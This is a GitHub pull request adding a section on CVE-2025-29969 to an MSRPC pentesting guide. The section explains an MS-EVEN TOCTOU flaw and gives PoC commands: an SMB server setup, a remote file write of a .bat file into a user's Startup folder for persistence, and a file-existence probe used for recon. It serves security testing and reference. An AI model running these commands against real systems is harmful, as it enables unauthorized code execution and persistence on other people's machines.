Skip to content

EventLogin - CVE-2025-29969 #2010

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
Open

EventLogin - CVE-2025-29969 #2010

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
32 changes: 32 additions & 0 deletions src/network-services-pentesting/135-pentesting-msrpc.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting
- **Named Pipe**: `\pipe\epmapper`
- **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM.


### MS-EVEN (EventLog Remoting) primitives

The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write.

Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path.

```bash
impacket-smbserver -smb2support Share /tmp/safebreach
```

The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script.

```bash
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat"
```

A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context).

#### MS-EVEN CreateFile-style primitive for recon

MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\<Vendor>`):

```bash
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY
```

### Identifying IP addresses

Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface.
Expand Down Expand Up @@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel

## References

- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969)
- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/)
- [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/)
- [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer)
- [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)
Expand Down